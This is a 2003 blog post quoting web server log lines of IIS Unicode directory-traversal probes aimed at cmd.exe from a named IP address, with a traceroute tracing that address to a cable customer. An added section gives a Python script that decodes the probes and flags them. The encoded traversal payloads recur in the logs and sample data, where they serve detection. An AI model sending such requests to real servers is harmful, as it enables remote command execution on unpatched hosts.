Thursday, April 24, 2003

Looking at my local httpd log files, I see a lot of this stuff...


68.115.216.153 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:56 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.115.216.153 - - [24/Apr/2003:13:14:58 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.115.216.153 - - [24/Apr/2003:13:14:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
68.115.216.153 - - [24/Apr/2003:13:15:00 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404


It's amazing how many people out there probably don't realize that their systems are compromised.
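The requests above are the IIS Unicode and double-decode traversal probes that the Nimda-era worms sent to every web server they could reach: the "..%c0%af.." and "..%252f.." forms are "../" written so that a lenient decoder would only see the traversal after the path check had passed. The script below is an added example, not part of the original post, showing how a defender can parse an Apache access log, decode each request the same lenient way (including the overlong two-byte forms and a second decoding pass for the double-encoded variants), flag requests that climb above the document root to reach cmd.exe, and count probes per source address. The sample log is constructed to mirror the post's lines but uses documentation addresses (RFC 5737) instead of the real one.

```python
"""Flag IIS Unicode / double-decode traversal probes in an Apache access log."""
import re
from collections import Counter

# Constructed sample shaped like the lines in the post (Apache common log format).
# Source addresses are documentation addresses, not the one in the post; the last
# probe line has no byte count, as in the post, so the parser treats it as optional.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
192.0.2.10 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
192.0.2.10 - - [24/Apr/2003:13:14:56 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
192.0.2.10 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
192.0.2.10 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
192.0.2.10 - - [24/Apr/2003:13:14:58 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
192.0.2.10 - - [24/Apr/2003:13:14:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
192.0.2.10 - - [24/Apr/2003:13:15:00 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
198.51.100.7 - - [24/Apr/2003:13:15:02 -0400] "GET /index.html HTTP/1.0" 200 1043
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3})(?: (?P<size>\S+))?$')
HEX = re.compile(r'%([0-9A-Fa-f]{2})')
CMD_RE = re.compile(r'/winnt/system32/cmd\.exe$', re.IGNORECASE)


def _escape_at(s, i):
    """Return (byte, index after it) if s[i:] starts with a %XX escape, else None."""
    m = HEX.match(s, i)
    return (int(m.group(1), 16), m.end()) if m else None


def lenient_decode(s):
    """One round of percent-decoding that is deliberately as permissive as the
    decoder these probes were written for: a 0xC0-0xDF lead byte followed by any
    %XX byte is folded into one two-byte code point, so the overlong forms %c0%af
    and %c1%9c come out as '/' and '\\'. A '%' that does not start a valid %XX
    escape is kept literally, which is why the double-encoded variants
    (%%35%63, %252f) only resolve on a second pass."""
    out, i = [], 0
    while i < len(s):
        esc = _escape_at(s, i)
        if esc is None:
            out.append(s[i])
            i += 1
            continue
        byte, nxt = esc
        if 0xC0 <= byte <= 0xDF:
            cont = _escape_at(s, nxt)
            if cont is not None:
                byte2, nxt = cont
                byte = ((byte & 0x1F) << 6) | (byte2 & 0x3F)
        out.append(chr(byte))
        i = nxt
    return ''.join(out)


def decode_request_path(target):
    """Drop the query string, decode twice (double encoding), map '\\' to '/'."""
    path = target.split('?', 1)[0]
    path = lenient_decode(lenient_decode(path))
    return path.replace('\\', '/')


def escapes_docroot(path):
    """True if resolving '..' segments ever climbs above the document root."""
    depth = 0
    for seg in path.split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != '.':
            depth += 1
    return False


def classify(target):
    """Label a request target, or return None if it looks benign."""
    decoded = decode_request_path(target)
    if escapes_docroot(decoded):
        return 'iis-unicode-traversal' if CMD_RE.search(decoded) else 'path-traversal'
    return None


def scan(log_text):
    """Parse each log line and keep the ones that match a probe pattern."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m['target'])
        if label:
            findings.append({'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
                             'raw': m['target'],
                             'decoded': decode_request_path(m['target']),
                             'label': label})
    return findings


def summarize(findings):
    """Probes per source address: the list to follow up on (PTR lookup, abuse report)."""
    return Counter(f['ip'] for f in findings)


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']} {h['time']} {h['status']} {h['label']}: {h['raw']} -> {h['decoded']}")
    print(summarize(hits))
```

Every probe line decodes to the same `/scripts/../../winnt/system32/cmd.exe`, which is the point: a detector that only matches the literal bytes would need one rule per encoding, while decoding first and then checking whether the path escapes the document root catches all eight variants with one rule. The 404 and 400 responses show that this Apache host was never at risk from the request itself; the finding is about the source, which is what the traceroute and PTR name below are used for.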

Doing a simple traceroute on this IP reveals that...


Tracing route to cpe-68-115-216-153.spart.sc.charter.com [68.115.216.153]
over a maximum of 30 hops:

1 10 ms 20 ms 10 ms 10.129.192.1
2 60 ms 10 ms 10 ms ts2srpspartsc.spart.sc.charter.com [172.22.32.3]
3 491 ms 330 ms 341 ms cpe-68-115-216-153.spart.sc.charter.com [68.115.216.153]

Trace complete.


Ah, a compromised Charter.net cable user. Doh. You better get that system plugged fast!
